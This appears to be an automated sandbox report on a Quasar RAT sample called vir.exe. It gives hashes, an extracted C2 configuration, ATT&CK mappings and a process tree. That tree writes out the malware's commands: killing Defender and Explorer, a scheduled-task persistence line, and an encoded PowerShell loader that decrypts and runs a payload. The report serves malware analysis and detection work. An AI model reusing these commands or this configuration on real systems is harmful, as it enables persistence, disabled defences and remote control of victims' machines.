Overview

overview

10

Static

static

10

vir.exe

windows11-21h2-x64

10

Resubmissions

Analysis

  • max time kernel
    62s
  • max time network
    77s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-05-2024 23:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vir.exe

  • Size

    36.2MB

  • MD5

    b264bf0492e3370ceda89b4163ec4fce

  • SHA1

    3999871b86399e8e7f00b7f07337eb33c36b2da0

  • SHA256

    5fcd371bdff34f9ac235a59e3b3f82c45638f94d144674cce9befe28c1d74edd

  • SHA512

    6cc45147128c5361c42a4f7bf111c8a76cf0b9a6a57a4fe56e8916e550d8c8bba987e7aee2db338c39bdd0f3ce7d0115bb8f1e578ea8eb5b1d300c986b1613ff

  • SSDEEP

    786432:a4RerlLa3nwEwrkACTe6YQbjGEhM67HXkvj:XulW3wEoA3HUr

Score
10/10
quasarromkadiscoveryevasionexecutionpersistencespywarestealertrojanupx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Windows security bypass 2 TTPs 5 IoCs
    evasiontrojan
  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Executes dropped EXE 13 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Windows security modification 2 TTPs 6 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • AutoIT Executable 10 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
    adwarespyware
  • Modifies registry class 28 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 44 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    "C:\Users\Admin\AppData\Local\Temp\vir.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\loader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\temp.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2880
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K main.cmd
          4⤵
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2548
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im WindowsDefender.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3008
          • C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\Rover.exe
            Rover.exe
            5⤵
            • Modifies WinLogon for persistence
            • UAC bypass
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Drops file in Program Files directory
            • Suspicious use of AdjustPrivilegeToken
            • System policy modification
            PID:3236
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\web.htm
            5⤵
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:1044
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef8373cb8,0x7ffef8373cc8,0x7ffef8373cd8
              6⤵
                PID:3816
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,1692315832614015375,14873300109557101004,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:2
                6⤵
                  PID:4812
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,1692315832614015375,14873300109557101004,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3092
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,1692315832614015375,14873300109557101004,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
                  6⤵
                    PID:3180
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1692315832614015375,14873300109557101004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
                    6⤵
                      PID:1752
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1692315832614015375,14873300109557101004,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
                      6⤵
                        PID:1852
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,1692315832614015375,14873300109557101004,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 /prefetch:8
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5060
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\helper.vbs"
                      5⤵
                        PID:4976
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\spinner.gif
                        5⤵
                        • Modifies Internet Explorer settings
                        PID:1124
                      • C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\psiphon3.exe
                        psiphon3.exe
                        5⤵
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of SetWindowsHookEx
                        PID:1336
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 1844
                          6⤵
                          • Program crash
                          PID:4424
                      • C:\Windows\system32\timeout.exe
                        timeout /t 15
                        5⤵
                        • Delays execution with timeout.exe
                        PID:3340
                      • C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\scary.exe
                        scary.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3968
                        • C:\Windows\SYSTEM32\schtasks.exe
                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                          6⤵
                          • Creates scheduled task(s)
                          PID:2680
                      • C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\the.exe
                        the.exe
                        5⤵
                        • Executes dropped EXE
                        PID:2008
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3352
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im taskmgr
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3964
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im explorer
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3128
                      • C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\ac3.exe
                        ac3.exe
                        5⤵
                        • Executes dropped EXE
                        PID:2176
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im fontdrvhost
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:352
                      • C:\Windows\system32\icacls.exe
                        icacls c:\Windows\explorer.exe /grant Admin:(F,M)
                        5⤵
                        • Modifies file permissions
                        PID:3060
                      • C:\Windows\system32\timeout.exe
                        timeout /t 15
                        5⤵
                        • Delays execution with timeout.exe
                        PID:1936
                      • C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809\jaffa.exe
                        jaffa.exe
                        5⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Drops file in Windows directory
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2304
                        • C:\Windows\SysWOW64\olxcaefvwn.exe
                          olxcaefvwn.exe
                          6⤵
                          • Modifies visibility of file extensions in Explorer
                          • Modifies visiblity of hidden/system files in Explorer
                          • Windows security bypass
                          • Disables RegEdit via registry modification
                          • Executes dropped EXE
                          • Windows security modification
                          • Enumerates connected drives
                          • Modifies WinLogon
                          • Drops file in System32 directory
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:3132
                          • C:\Windows\SysWOW64\edbrtdzp.exe
                            C:\Windows\system32\edbrtdzp.exe
                            7⤵
                            • Executes dropped EXE
                            • Enumerates connected drives
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:1752
                        • C:\Windows\SysWOW64\gocvegkixiazqiw.exe
                          gocvegkixiazqiw.exe
                          6⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:3404
                        • C:\Windows\SysWOW64\edbrtdzp.exe
                          edbrtdzp.exe
                          6⤵
                          • Executes dropped EXE
                          • Enumerates connected drives
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:2700
                        • C:\Windows\SysWOW64\geokruvbqpwez.exe
                          geokruvbqpwez.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:4212
                        • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                          6⤵
                          • Drops file in Windows directory
                          • Checks processor information in registry
                          • Enumerates system info in registry
                          • Suspicious behavior: AddClipboardFormatListener
                          • Suspicious use of SetWindowsHookEx
                          PID:1312
                • C:\Users\Admin\AppData\Local\Temp\33b04710-09bd-4112-9c20-f710ef7185d3\packer.exe
                  "C:\Users\Admin\AppData\Local\Temp\33b04710-09bd-4112-9c20-f710ef7185d3\packer.exe" "C:\Users\Admin\AppData\Local\Temp\33b04710-09bd-4112-9c20-f710ef7185d3\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "loader.exe" "C:\Users\Admin\AppData\Local\Temp\vir_846eedc0-abdd-42bb-a08f-6c11cda4f809" "" True True False 0 -repack
                  2⤵
                  • Executes dropped EXE
                  PID:1564
              • C:\Windows\System32\CompPkgSrv.exe
                C:\Windows\System32\CompPkgSrv.exe -Embedding
                1⤵
                  PID:872
                • C:\Windows\System32\CompPkgSrv.exe
                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                  1⤵
                    PID:3576
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1336 -ip 1336
                    1⤵
                      PID:2868
                    • C:\Windows\system32\AUDIODG.EXE
                      C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004DC
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2544

                    Network

                    MITRE ATT&CK Enterprise v15

                    Reconnaissance

                    Resource Development

                    Initial Access

                    Execution

                    Command and Scripting Interpreter

                    1
                    T1059

                    PowerShell

                    1
                    T1059.001

                    Scheduled Task/Job

                    1
                    T1053

                    Persistence

                    Boot or Logon Autostart Execution

                    3
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Winlogon Helper DLL

                    2
                    T1547.004

                    Scheduled Task/Job

                    1
                    T1053

                    Privilege Escalation

                    Abuse Elevation Control Mechanism

                    1
                    T1548

                    Bypass User Account Control

                    1
                    T1548.002

                    Boot or Logon Autostart Execution

                    3
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Winlogon Helper DLL

                    2
                    T1547.004

                    Scheduled Task/Job

                    1
                    T1053

                    Defense Evasion

                    Abuse Elevation Control Mechanism

                    1
                    T1548

                    Bypass User Account Control

                    1
                    T1548.002

                    File and Directory Permissions Modification

                    1
                    T1222

                    Hide Artifacts

                    2
                    T1564

                    Hidden Files and Directories

                    2
                    T1564.001

                    Impair Defenses

                    3
                    T1562

                    Disable or Modify Tools

                    3
                    T1562.001

                    Modify Registry

                    10
                    T1112

                    Credential Access

                    Unsecured Credentials

                    1
                    T1552

                    Credentials In Files

                    1
                    T1552.001

                    Discovery

                    Peripheral Device Discovery

                    1
                    T1120

                    Query Registry

                    4
                    T1012

                    System Information Discovery

                    5
                    T1082

                    Lateral Movement

                    Collection

                    Data from Local System

                    1
                    T1005

                    Command and Control

                    Exfiltration

                    Impact

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files (x86)\rover\Come\Come.001.png
                      Filesize

                      2KB

                      MD5

                      8d0dfb878717f45062204acbf1a1f54c

                      SHA1

                      1175501fc0448ad267b31a10792b2469574e6c4a

                      SHA256

                      8cf6a20422a0f72bcb0556b3669207798d8f50ceec6b301b8f0f1278b8f481f9

                      SHA512

                      e4f661ba8948471ffc9e14c18c6779dba3bd9dcc527d646d503c7d4bdff448b506a7746154380870262902f878275a8925bf6aa12a0b8c6eb8517f3a72405558

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.002.png
                      Filesize

                      2KB

                      MD5

                      da104c1bbf61b5a31d566011f85ab03e

                      SHA1

                      a05583d0f814685c4bb8bf16fd02449848efddc4

                      SHA256

                      6b47ad7fe648620ea15b9c07e62880af48a504b83e8031b2521c25e508aa0ef1

                      SHA512

                      a8e27abefb0f5bfffe15a19fd882b2e112687abe6ac4bbd5187036cb6058b0124d6ce76fc9227970c8fe2f5768aa0d1faa3319d33b1f42413e8bdfe2ce15296d

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.004.png
                      Filesize

                      2KB

                      MD5

                      f57ff98d974bc6b6d0df56263af5ca0d

                      SHA1

                      2786eb87cbe958495a0113f16f8c699935c74ef9

                      SHA256

                      9508d82995364556a882c54306210e885868a8df2f2ad93485c14f88c9f9e1b7

                      SHA512

                      1d4ca268d1c98ac545008b079076609e18bfdf22cd31b7b75b9218d03c6edb37b245298ff717e48309ca862f973a4383b101e43732a162b4d7f78573612c64ea

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.005.png
                      Filesize

                      2KB

                      MD5

                      7fb2e99c5a3f7a30ba91cb156ccc19b7

                      SHA1

                      4b70de8bb59dca60fc006d90ae6d8c839eff7e6e

                      SHA256

                      40436d5ab3589d33dae09b470ccacd369422d2569804cf1532e5946fc7e45535

                      SHA512

                      c0d83325928d629abba648360c8687091d18d52991297d69625ccd4617d4d5add4aa16c288cc408b26c79cd37decf5ee2198e8b87b67ef5b88802afae93fb51a

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.006.png
                      Filesize

                      3KB

                      MD5

                      a49c8996d20dfb273d03d2d37babd574

                      SHA1

                      96a93fd5aa1d5438217f17bffbc26e668d28feaf

                      SHA256

                      f4c568336894b3140f0ca7005a5751ad5a860422290b2b6e23d72656160862b1

                      SHA512

                      9abb666891fa00ae77801fe9b3aab62bca37402197d22983e98d8442e6d890b1091a47dc1eca1ac68caa52a633bb60c8c3248de65056a6435f4affb98f401a30

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.007.png
                      Filesize

                      3KB

                      MD5

                      e65884abe6126db5839d7677be462aba

                      SHA1

                      4f7057385928422dc8ec90c2fc3488201a0287a8

                      SHA256

                      8956643da83aa74bc89b4d71db7b470200863de230be647a6881d8f3f60df3ac

                      SHA512

                      7285b8acca0210a85dd4317a7beab161708544c4c25a742ce7284b545fa4953be89eb685e62f30fba56d6cb2fc806062ccdf4a0e62516eea047097c6856900c2

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.008.png
                      Filesize

                      3KB

                      MD5

                      f355305ada3929ac1294e6c38048b133

                      SHA1

                      a488065c32b92d9899b3125fb504d8a00d054e0e

                      SHA256

                      37de9b0126ffa3967455083dd72ba70501b1e4c92ae25eb0667f840911585775

                      SHA512

                      6082003d98022597007623ff7cdece9d9a14ad19bf55ac35afb2277fe22378c865899a5b28b4b5828d0d48fb7859fea82886d98d8d3a3813413f1e864e3849b2

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.009.png
                      Filesize

                      3KB

                      MD5

                      1d812d808b4fd7ca678ea93e2b059e17

                      SHA1

                      c02b194f69cead015d47c0bad243a4441ec6d2cd

                      SHA256

                      e4e2fe6652557dec0e703da7325808cab4722961398dc9bf9fdae36c1de8841d

                      SHA512

                      a8781c78d7d23f70f7450e749732d2909447cfa194d8e49a899c77f808e735878da8d838eecb4e8db7470d040800ae45f977d5f208bfad6c15d62d6456611e84

                      Download Submit

                    • C:\Program Files (x86)\rover\Come\Come.010.png
                      Filesize

